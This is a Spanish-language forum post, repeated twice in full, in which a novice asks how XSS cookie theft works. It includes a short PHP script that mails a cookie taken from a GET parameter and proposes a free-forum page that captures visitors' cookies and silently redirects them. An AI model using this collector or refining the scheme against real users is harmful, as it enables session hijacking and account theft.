He leido varios tutoriales de XSS de esta misma web, pero siempre quedo con las mismas dos interrogantes. Son muy basicas y pueden estar erróneas, lo sé xD pero que mejor manera de aprender que preguntar? 
espero que alguien pueda sacarme la duda... Tengo entendido que se puede obtener el valor de una cookie remota y enviarlo por correo mediante php, hasta ahi todo bien:
<?
php
$cookie = $_GET["cookie"];
mail("correo", "Asunto del msj", $cookie);
?>
Es posible que dicho código se ejecute automáticamente al ingresar a una web? (como si fuera un script o algo asi... hablo internamente osea en el propio código html, sin llamar archivos externos)... y al pulsar un botón?Entiendo que PHP se ejecuta del lado del servidor y HTML del lado del cliente, por eso la duda, leí que esto era posible mediante AJAX o algo por el estilo, alguna idea?
Por otro lado: No entiendo el porqué del "<script>alert()</script>" ni de ciertas partes del proceso, que el objetivo de un ataque XSS no es que el usuario ingrese y ejecute un cierto código para capturar y enviar la cookie a un tercero? Entonces yo podría crear una página en formato html en un foro (foroactivo por ej. permite crear páginas html que se ejecuten antes del foro) y colocar el código alli... el usuario entra, ejecuta el código y se lo redirecciona a otro foro cualquiera mediante la instrucción:
<META http-equiv=Refresh content='0;URL=www.loquesea.com'>
es decir que el usuario nunca ingresa al foro original sino que ve la html creada, se capturan las cookies y se lo redirecciona, obiamente podría crearla si yo soy el propietario del foro pero como crear uno allí es gratuito y libre para todos, es cuestión de segundos. La idea es usar XSS sin tener que estar subiendo archivos o enviando links sospechosos, solo el link de un foro propio y un poco de programación web...
es posible atacar así?
Si estas dos cosas se pudieran hacer sería muy sencillo un XSS no?
No se si se entendió mi idea XD
Saludos y gracias
espero que alguien pueda sacarme la duda... Tengo entendido que se puede obtener el valor de una cookie remota y enviarlo por correo mediante php, hasta ahi todo bien: <?
php
$cookie = $_GET["cookie"];
mail("correo", "Asunto del msj", $cookie);
?>
Es posible que dicho código se ejecute automáticamente al ingresar a una web? (como si fuera un script o algo asi... hablo internamente osea en el propio código html, sin llamar archivos externos)... y al pulsar un botón?Entiendo que PHP se ejecuta del lado del servidor y HTML del lado del cliente, por eso la duda, leí que esto era posible mediante AJAX o algo por el estilo, alguna idea?
Por otro lado: No entiendo el porqué del "<script>alert()</script>" ni de ciertas partes del proceso, que el objetivo de un ataque XSS no es que el usuario ingrese y ejecute un cierto código para capturar y enviar la cookie a un tercero? Entonces yo podría crear una página en formato html en un foro (foroactivo por ej. permite crear páginas html que se ejecuten antes del foro) y colocar el código alli... el usuario entra, ejecuta el código y se lo redirecciona a otro foro cualquiera mediante la instrucción:
<META http-equiv=Refresh content='0;URL=www.loquesea.com'>
es decir que el usuario nunca ingresa al foro original sino que ve la html creada, se capturan las cookies y se lo redirecciona, obiamente podría crearla si yo soy el propietario del foro pero como crear uno allí es gratuito y libre para todos, es cuestión de segundos. La idea es usar XSS sin tener que estar subiendo archivos o enviando links sospechosos, solo el link de un foro propio y un poco de programación web...
es posible atacar así?
Si estas dos cosas se pudieran hacer sería muy sencillo un XSS no?
No se si se entendió mi idea XD
Saludos y gracias